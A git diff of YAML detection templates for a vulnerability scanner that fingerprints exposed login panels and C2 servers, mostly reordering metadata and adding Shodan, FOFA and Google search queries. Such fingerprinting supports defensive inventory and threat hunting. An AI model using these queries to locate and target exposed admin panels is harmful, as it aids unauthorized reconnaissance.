' -# digest: 4b0a00483046022100dfd4490a71cb9b8b3932060ec37eb1f5de6e1f48093b7c301727311d5af578fb022100e60a0b137d4b4847ae2a60df31d11734702dcaea8e6b45737c4ddb720bbd9b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059125fba682eed0eba3921749c8232c1ed0610de0fe9636503c172b7b261074a02205d3a9b344da6d2ccdd5c0eff3f8a57999f78cf3b84307e79e0c77dd7e5f0d620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beego-admin-dashboard.yaml b/http/exposed-panels/beego-admin-dashboard.yaml index 22d1488037..115c0b254b 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -14,11 +14,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:beego:beego:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: beego - shodan-query: html:"Beego Admin Dashboard" - vendor: beego verified: true + max-request: 1 + vendor: beego + product: beego + shodan-query: + - html:"Beego Admin Dashboard" + - http.html:"beego admin dashboard" + fofa-query: body="beego admin dashboard" tags: panel,beego,unauth http: @@ -43,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f7965bc6043d9d83248d2e42e3d19cb5742d01d256cb5dc25dc0531f84db1d00221009998e1ccd239000a1a813daeb04b8240f13edc6fa17d95373fe90a2014fa079a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0435b232958cace184a3be45bdd78d1e0d6b99ce8480becd429e7ed63fc2a6d02201a6cfb4957ab92ddadb30977b2c6bbcbd717a2f80fb2dd4f6a256e4a3c9fde75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index c229ddb16e..72817e382e 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.beyondtrust.com/products/privileged-remote-access metadata: - max-request: 1 - shodan-query: http.html:"BeyondTrust Privileged Remote Access Login" verified: true + max-request: 2 + shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" tags: panel,beyondtrust,login,detect http: @@ -28,4 +28,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "beyondtrust privileged remote access login", "privileged-remote-access") && contains(to_lower(body), "login")' condition: and -# digest: 4a0a00473045022100a2d7e8941f79250b90fafb2e91d4d53a6e6b4bac5e49cabdd92dcffcfc6975e302201712103829d44bfb897cc1cbc4f33b757930cc5f8affd4e42259cf3b3b6493fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 4138ba3f2e..1d9bf490c3 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:bigbluebutton:greenlight:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: greenlight vendor: bigbluebutton + product: greenlight tags: panel,bigbluebutton http: @@ -35,4 +35,4 @@ http: group: 1 regex: - 'Greenlight<\/a>\. (.*)' -# digest: 490a0046304402202190ecc43fb8bb246d538d76505f37e2915842ced04370651f91b7222f775bba02204de8e4463ca9fb19875e4712a07b51d1109d79641f6e606619fccb61a65b4433:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe6845646e275bdfbca4e1dea47379dc8c036ac50d33169c22623c8535d6f8b0022100d4dab2264091595748d36df3d2e8c2e426bbbf57ba18fc9c6c1bed0a79f1d851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index 9c5494fb58..deac005e3a 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"BigFix" max-request: 1 shodan-query: http.title:"BigFix" + google-query: intitle:"BigFix" tags: panel,bigfix http: @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b65e3dfcfcf9e3452781c3af28bb02e13d42cc749c4c36bcb781803222cf770802206e26f87158d27f3ed4d2a4b012d6dae45d2c4f92127f252880064fcabddb7026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065f6a33038d7d84d83a99da20a8c681b5da9d4f21841808f9d2cb8693b4d42c50220532723384c6d829d2292ae0c5bbcc40c8eee10f9e8dab56e2f2ddb6546d99d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index cc49e1b1c3..66fdd0422e 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -16,9 +16,13 @@ info: cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" vendor: f5 + product: big-ip_access_policy_manager + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: panel,bigip,f5 http: @@ -36,4 +40,4 @@ http: - type: status status: - 401 -# digest: 4a0a0047304502206764af3b5f83ceb4bd05ce52af8e68efa0979e7592565a63364aacb06c97dbf8022100dd4aadb0f61ba02642e4db9ab5f2af21d3a48b462fd6fda05f279c47a95d09d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003fc8a5114d6bc010538fb9be54710294c20232de1c5cca399316ff67e904d06022100967ce7b24c9378d380906c306b59ddbfb63ebfbdd06430c4bcac83c1fd52f41e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index c5b589e260..d6622230c6 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"BioTime" - verified: true tags: panel,biotime http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041c4bf54097a3c06343835d18246d98241fd836a92c9891ce56bf0a2877c6d24022100c1ba12357b9380235a1b4574b3c008c01223ec4a72cec702e0a0b12c7e3a9a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa05c8a043bd0b0ba9aea94f73ad920f9c5f2325d35d876ce630f261049eb37f02207ff889721c8e76f7cf811f925ca59a9d9c5a1ade618acdc23a265c500fca8869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index 56ce04d8b4..3220b0ca2b 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:bitdefender:gravityzone:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: gravityzone - shodan-query: title:"Bitdefender GravityZone" - vendor: bitdefender verified: true + max-request: 1 + vendor: bitdefender + product: gravityzone + shodan-query: + - title:"Bitdefender GravityZone" + - http.title:"bitdefender gravityzone" + fofa-query: title="bitdefender gravityzone" + google-query: intitle:"bitdefender gravityzone" tags: panel,bitdefender http: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206be53c1b505d353d82468b722644f5c4c955be8646d69a2151b1ceb3154f3f4f02207c437100098d684db2ce162e5db23d6d24fef3c2a4b0f17f36837729e01a9c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c2a091c4179b9e8ba409933cb24b7e6126889a2b6c8f60b2fe440cb5237406702205975d7ca55a946865fab0e155d841ea72ce92eff688adf7a71be125b030c2431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index 358de53163..7b90853823 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -10,8 +10,10 @@ info: cpe: cpe:2.3:a:bitrix:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bitrix24 vendor: bitrix + product: bitrix24 + shodan-query: http.html:"/bitrix/" + fofa-query: body="/bitrix/" tags: panel,bitrix,login http: @@ -34,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aed76166bf76788a65dd64db6b0e9852bd233f2edf6c712aa5e0212453007677022100a1805a4a145e8d95695f5f754536f777d3c0a37b4a1867725675ee535755aeef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c0b7a4a474bfad77d7caee6e5094a17fc30480c4bb7984c058f33c1597961750221008af382be31ff547030a86cf127a555ba2c5df6af24a798025c9b5d7c6c67e13d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index c0f79ca4db..05bb324c44 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: bitwarden - shodan-query: title:"Bitwarden Web Vault" - vendor: bitwarden verified: true + max-request: 1 + vendor: bitwarden + product: bitwarden + shodan-query: + - title:"Bitwarden Web Vault" + - http.title:"bitwarden web vault" + fofa-query: title="bitwarden web vault" + google-query: intitle:"bitwarden web vault" tags: panel,bitwarden,vault,detect http: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aca06cb2930ef1e0b8f2b3e1978225343e6d79ce69f7c46242018b212bfc15d5022031401800c88ea9431ae7a415edd7b4c0a217e32b30e1b5f06b3b3438192f8099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008cf720bb429655c6a9a68aa4f0352563dd640acc2731aca393bda81d7add1a40022100b30f69abbab5fb6641768522e6dfc050f25f38fd72997b1db54afb891012d707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index b7abefcc13..bbf4a6f9c6 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Black Duck" - verified: true tags: panel,blackduck,synopsys http: @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ea24e64db385b676ed987956903c076911be347a07531f076856460d2a0efc4022100962cbde46271d1a25366e443128224303444467910f0f6967f61e89725feedc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022013e7b2bc1c0eb0af3800a1d928e90ed78efa8858a004a6f32e7f8bd91c1ae2ab022006e6f835652fc9f9fcf7aef711c8536d23389c7b12e1ac575dc7643cdf37dcf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index c70416ad14..aa432e4f84 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -7,11 +7,13 @@ info: classification: cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* metadata: - fofa-query: Powered by bloofoxCMS - max-request: 2 - product: bloofoxcms - vendor: bloofox verified: "true" + max-request: 2 + vendor: bloofox + product: bloofoxcms + fofa-query: + - Powered by bloofoxCMS + - powered by bloofoxcms tags: panel,bloofox,cms http: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203756982c43b1269b90d14a376c9f0465532699b21984f7be0b087b39eb2a2f38022100a2eded3d7d8c7645fb608e8cb959a8cc08a2139faad81a2173f803ab6728fd96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078ab842389cb78b25ec38a119c4a89374aff528265c422fd1830ae10d85a1e42022100ee523748c7b2988e42ef69f4642fbc9455a5c038faa29d4ec263c53847a8a75d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index f7a06681ee..a052b2d8da 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"BMC Software" - verified: true tags: panel,bmc http: @@ -40,4 +40,4 @@ http: group: 1 regex: - '<span class="logo-version">Version ([0-9.]+)' -# digest: 490a0046304402202d14fe97a89572e24a09d0dba0c3f5467f7009a8ca73446b8b5e4863f6eb1a0f02203c72c903fcbb2e6b6ca22b54f4db01537db52401dd6cb789320d9e839bc7a92b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1633424a257ed110a2aabae8f8009bbed533db9d2a7ffc5d43ee8b4c5e9180f02200deb2a0ffac69838d4ab5a607cb4e56ed2f838bce2b10f0774ae412a112b9481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml index b872e66d2a..5b6a224f1f 100644 --- a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml +++ b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml @@ -1,19 +1,19 @@ id: bmc-remedy-sso-panel -info: - name: BMC Remedy SSO Login Panel - Detect - author: righettod - severity: info - description: | - BMC Remedy Single Sign-On domain data entry login panel was detected. - reference: - - https://www.bmc.com/it-solutions/remedy-itsm.html - metadata: - verified: true - max-request: 2 - shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" - tags: panel,bmc,login,detect - +info: + name: BMC Remedy SSO Login Panel - Detect + author: righettod + severity: info + description: | + BMC Remedy Single Sign-On domain data entry login panel was detected. + reference: + - https://www.bmc.com/it-solutions/remedy-itsm.html + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" + tags: panel,bmc,login,detect + http: - method: GET path: @@ -28,4 +28,4 @@ http: - 'status_code == 200' - 'contains(to_lower(body), "<title>bmc remedy single sign-on domain data entry")' condition: and -# digest: 4b0a00483046022100a8bf1cc83392001186b717e3a336510cfb642a7f36fa1a5ad9bc33b1469ccbf4022100a49d23890aacc49884c921ccd9887487fa7507997b020eb823845d1d3957adde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5e53b4c7f430a309582e96e90640b031d186d63303ca0657bdc61ea9b70242402206ccf010df92b973f2b5bf2f043f8dc75fca21dfcae311bf3f70ed0f7251e6119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index 540b00d09c..629e4c43f9 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:boltcms:bolt:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bolt vendor: boltcms + product: bolt + shodan-query: cpe:"cpe:2.3:a:bolt:bolt" tags: panel,bolt,cms,login,boltcms http: @@ -45,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8684f4c1b177c03406b0ec21626ca0f724aeb29eae2f9ab567a9dce7e837fcc022100e992011e055c81ba50abc96b5f8fbb09825502114e29c05d28c119d6f4940b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203885f37d4a99874d10a961e3e8a6b109aaa0b83c2a4504b76f517d0fa8aa879c02210098a324e1efa823287f6f4f9f036a1c1e6fadd4a3e27aa96add77c850a439de74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index d2e5dc91c6..7f2e38896a 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:bookstackapp:bookstack:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bookstack - shodan-query: http.title:"BookStack" vendor: bookstackapp + product: bookstack + shodan-query: + - http.title:"BookStack" + - http.title:"bookstack" + fofa-query: title="bookstack" + google-query: intitle:"bookstack" tags: panel,bookstack,bookstackapp http: @@ -47,4 +51,4 @@ http: group: 1 regex: - '(?:app\.js|(?:print\-)?styles\.css)\?version=([\w\.\-]+)["'']>' -# digest: 4b0a00483046022100a539d284db0c4dd9737c31c3a9fb379e836a46646c6cff2a33b241c823c96c60022100c53b3a54a862556d553ab1571c96f1d7bd6eb079c5640497cfe273200a3bd61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220441c5e876a16cf1c543b6aa23dcd05323cc28664a0f4c8edb1d4864ebba49c84022100d495e5bbfa7b589fb3fe923688fa719d535f5e1740a0f1b24b264cf8253f6155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index 6fd9dc497e..b91ca69cbb 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:buildbot:buildbot:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: buildbot - shodan-query: http.title:"BuildBot" - vendor: buildbot verified: true + max-request: 1 + vendor: buildbot + product: buildbot + shodan-query: + - http.title:"BuildBot" + - http.title:"buildbot" + fofa-query: title="buildbot" + google-query: intitle:"buildbot" tags: panel,buildbot,cicd http: @@ -45,4 +49,4 @@ http: part: body regex: - '\[\"Buildbot\", \"([0-9.]+)\"\]' -# digest: 490a0046304402202b4838278ef1da25a98701864436665c8650f5faf42d8ee3aad3f2cd1d1096d502206fc9f344bb9c2536b0803c91ed15323b30f9dc1e8398936fde98b6068c9b331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008aef311f7bab6673a6dfff11db301ed3757b7baf2087eb1d37533717f93ab78702210094c33daa764babacbeba9ab5c683a38d6c5a363454905661de9c5161ba8ab12d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml new file mode 100644 index 0000000000..c01ce2e9dd --- /dev/null +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -0,0 +1,34 @@ +id: busybox-repository-browser + +info: + name: Busybox Repository Browser - Detect + author: ritikchaddha + severity: info + description: | + Busybox Repository Browser was detected. + reference: + - https://github.com/mirror/busybox + metadata: + verified: true + max-request: 1 + fofa-query: title="Busybox Repository Browser" + tags: detect,busybox,oss,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Busybox Repository Browser" + - "index</a>" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bynder-panel.yaml b/http/exposed-panels/bynder-panel.yaml index 9d72dff4bd..9489070997 100644 --- a/http/exposed-panels/bynder-panel.yaml +++ b/http/exposed-panels/bynder-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.bynder.com/en/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1017650009 - verified: true tags: panel,bynder,login,detect http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'http-equiv="version"\s+content="([0-9\.]+)"' -# digest: 4b0a00483046022100b5cc6f8bf28e8c01adecf1b54e1b5edb9810b58c6ccda55c5f6e3fe6fac3ac76022100e19df4227b127b06f178bd511254477e09fab706884b929bbf708c197f075c66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014e074f997f25c5349854831b2cd24af440b348051e92a715fb085efe968a774022100deee406451e3a53f822d7e0580a8bc8eb08d41db2cd6f98621223dc1d5370c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml index 71aa6b7939..607104e83f 100644 --- a/http/exposed-panels/c2/ares-rat-c2.yaml +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: + verified: true max-request: 1 shodan-query: product:'Ares RAT C2' - verified: true tags: c2,ir,osint,ares,panel,rat http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f391bde1caab637dadd216cedd223a7fcec59ffb58278a87a7a5c88e89f3844022100ad24450fff2f2fcc52d87582f0159aa5ca5f4e3694ffc3f6c63918444eb7d2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b62bc5a67524c652daab1f294f759186a46a5ffcebd03628386ab2e29d339000220211bc1d3284e25aca84307b362a7ab113b2a13f1ff36a09679f3811be9addd4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 31e53afd96..ef13e0ee7f 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -9,9 +9,9 @@ info: reference: - https://bruteratel.com/ metadata: + verified: "true" max-request: 1 shodan-query: http.html_hash:-1957161625 - verified: "true" tags: c2,bruteratel,c4,panel http: @@ -26,4 +26,4 @@ http: - "contains(body, '404 file not found')" - "(\"1a279f5df4103743b823ec2a6a08436fdf63fe30\" == sha1(body))" condition: and -# digest: 4a0a00473045022100f66117aa613792028cebcc42d9db7423777d88c444b4dab2d52ee783d39d2291022067a0b3b9824bc202ed2a5056841e91cc65a0aa445f612969de96486ad0cbe181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd5cd2330b7e2d4096dbe45a8b705242bfb468b852259e14afc4d7068a444f150220237c96a8d367ae034fc8fd5e37492345eab15c7f3366a51e019a768450c75acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index d8092dae1d..9acf0e641e 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/mitre/caldera - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - fofa-query: http.favicon.hash:-636718605 - max-request: 1 verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 tags: c2,ir,osint,caldera,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1b48b33f9e658a431608ef7e5e0bf2a65ac9b8318e308275b2118098ac7323002202dc01ffbd25675e08406159da6ce180546948f024dee7060f888bf0ab94df06e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index 3321d610c8..6100bed377 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: + verified: true max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” - verified: true tags: c2,ir,osint,covenant,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b187174c24f50ffdb1c8238284b465a9e97891282087de49629a4dfd0314614402204835b7ac9cbb38517294dbb37098f51a8ba69901c98ab64d1b471acf96ed762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a4d556734af50f37fe66ba5d17f726d3bf5bb0118f41225788b74e06427b60402206d110b54940c6ece284653ee678c48aa88e98095836109fd5ce73b64b2830645:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index ec42a53d8f..d5755815ca 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: + verified: true max-request: 1 shodan-query: http.html_hash:-14029177 - verified: true tags: c2,ir,osint,deimosc2,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8f988797806487c3954f68ba5190d3c2bd039426b06c57e24f8fb50aa54ace5022100963c074463fb72e56b9770e9b208995ba0870bcbb2caa791a6cf7dde8f942baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a05b1817e04d0643682a561d9e55f4f1ef13604b4d1036366e8d897c3a9bbc9002205b7ab5fbf8790f6c876cd2d7e4712e9ef45d92abf8f072b6018a455b075affb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index 33aa844a71..96e14e4814 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/thehappydinoa/awesome-censys-queries#security-applications - https://bc-security.gitbook.io/empire-wiki/ metadata: - censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc - max-request: 1 verified: "true" + max-request: 1 + censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc tags: c2,ir,osint,empire,panel http: @@ -24,4 +24,4 @@ http: - type: dsl dsl: - "(\"dcb32e6256459d3660fdc90e4c79e95a921841cc\" == sha1(body))" -# digest: 4a0a0047304502204272b0e3e53274ba1d2c28bf3b44ad0945eda9eed8289b6aa5c764a9cb9e6ca8022100964e9d3e83038cadd2a57742e65cc085a6159c9c575ce477dd57749ca658bcea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052f057abc1e056c8c32bf8d2891e13713b1ab7954bbe4b0a6e9708c38a25ebd3022100bcd41dce3d9a23afe4e5ca1b8b85ce3209ac68c14709533258f10bc48977988a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index 33fe9927d3..1952131e96 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -9,9 +9,9 @@ info: reference: - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/delivery/evilginx metadata: - censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d - max-request: 1 verified: "true" + max-request: 1 + censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d tags: tech,evilginx,c2,phishing,panel http: @@ -26,4 +26,4 @@ http: - "status_code == 200 && contains(body, 'Evilginx')" - "(\"b18d778b4e4b6bf1fd5b2d790c941270145a6a6d\" == sha1(body))" condition: and -# digest: 4a0a00473045022100b054d578c96330ba422da33cffeda19ec169680fd610d9fa3901220a1c4be42f022066ae1460859829e4bd3c2c9fa225379aca75366998df8de19fa6403990b8147c:922c64590222798bb761d5b6d8e72950 \ No 